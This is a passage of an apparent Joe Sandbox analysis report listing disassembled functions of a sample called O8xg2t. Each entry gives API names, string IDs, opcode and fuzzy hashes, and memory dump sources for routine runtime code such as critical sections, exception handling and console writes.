                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction ID: dc75bc0ad159981e4af71e124b3389786561e70c56483767095489e48a05d63f
                                  • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction Fuzzy Hash: 04517FB290C3828AEF64AF21D484B6A77A0EB54B84FAC4135DA4D6BB85CF3CF454C700
                                  Function 00007FFBC32051D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction ID: 48d53e1834c5f5568877b8f373fd703032ebd8ef0c8d49752ac5a3fb3da99da6
                                  • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction Fuzzy Hash: F861927290CBC585DB60AF25E4407AAB7A0FB84B84F584225EB9C1BB55DF7CD194CB00
                                  Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressHandleLoadModuleProc
                                  • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                  • API String ID: 3055805555-3733552308
                                  • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                  • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                  Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Process$CurrentSizeWorking
                                  • String ID: Shrinking process size
                                  • API String ID: 2122760700-652428428
                                  • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                  • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                  Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$Leave
                                  • String ID:
                                  • API String ID: 2801635615-0
                                  • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                  • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                  Function 00007FFBC320E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction ID: 722782294bf27c7b0e1d60491b4610e1c2fb1880d4af5d019b3b60bd6a29d323
                                  • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction Fuzzy Hash: CDD108B2F08A8189EB11DF75D4806ED37B1FB44798B884236DE5D6BB99DE38D44AC340
                                  Function 00007FFBC320ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFBC320ED07), ref: 00007FFBC320EE38
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFBC320ED07), ref: 00007FFBC320EEC3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ConsoleErrorLastMode
                                  • String ID:
                                  • API String ID: 953036326-0
                                  • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction ID: bc0060bbca3f17f6f7ed8b7e9410476f719397b99e53a02845e36e2fa3eb9091
                                  • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction Fuzzy Hash: A091C7B2F18A5185FF60AF75D440A7E6BA4AB04798F984135DE4E7A685DF38D48AC300
                                  Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                  • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                  • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                  • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                  • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                  Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                  • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                  Function 00007FFBC3202218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction ID: 300e9d97a577a314a47ad2e2211157d91ddeddf12184fe1fc4cbce8b89e43a02
                                  • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction Fuzzy Hash: 35114C62B14B058AEF00DF70E8446B933B4F719758F881A31EA2D5A7A4DF38D558C340
                                  Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateEvent$CriticalInitializeSection
                                  • String ID:
                                  • API String ID: 926662266-0
                                  • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                  • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                  Function 00007FFBC3205C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: __except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 1467352782-3733052814
                                  • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction ID: 6a6fe900e328f622ca646d5f10fb0187f6ca9576bd3fd161c0433466bdc761ca
                                  • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction Fuzzy Hash: ED7183B250C68186DF60AF35D484B7E7BA0FB04B84F688136DE8C6BA89CB3CD459C744
                                  Function 00007FFBC3206298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateFrameInfo__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2558813199-1018135373
                                  • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction ID: 7100c86260c25f067104827c3bdd9f4bcb5c84eed2f601bcd04d953338ea06f4
                                  • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction Fuzzy Hash: B15162B261874196DA20FF25E080A6E77A4FB89B90F980134EB8D1BB55CF3CE465CB00
                                  Function 00007FFBC320EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction ID: 08781e5ee7fbf188fe9f3d7044082d468bb2cdb0a6998a669b7902f3765ae6e6
                                  • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction Fuzzy Hash: 4741B2B2A19A4181DF20EF75E4447AA77A0FB88794F884131EE4E9B794DF3CD445CB40
                                  Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID: csm
                                  • API String ID: 3997070919-1018135373
                                  • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                  • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                  • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                  • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                  Function 00007FFBC3210910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00007FFBC3203A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBC3203A63
                                  • __GSHandlerCheckCommon.LIBCMT ref: 00007FFBC3210993
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CheckCommonHandler__except_validate_context_record
                                  • String ID: csm$f
                                  • API String ID: 1543384424-629598281
                                  • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                  • Instruction ID: d1f53d47c39e8afceb262e2fd35fa0d2909f5c2b02845ddf3923135eccfc676f
                                  • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                  • Instruction Fuzzy Hash: A211AF72A1878585EB50AF32E5819AAB764EB45FC4F8C8035EF882FB56CE38D851C700
                                  Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-484248852
                                  • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                  • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                  • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                  • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                  Function 00007FFBC3203990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC320112F), ref: 00007FFBC32039E0
                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC320112F), ref: 00007FFBC3203A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                  • Instruction ID: 8794dc55e629af33f632151be59851f87d6bb74f3517eeb7756924e450a3536b
                                  • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                  • Instruction Fuzzy Hash: 61115E72618B4582EB209F25E44066A77E4FB88B84F984230EFCD1BB58DF3CD555CB00
                                  Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-3336177065
                                  • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                  • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                  • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                  • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                  Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                  • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                  • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
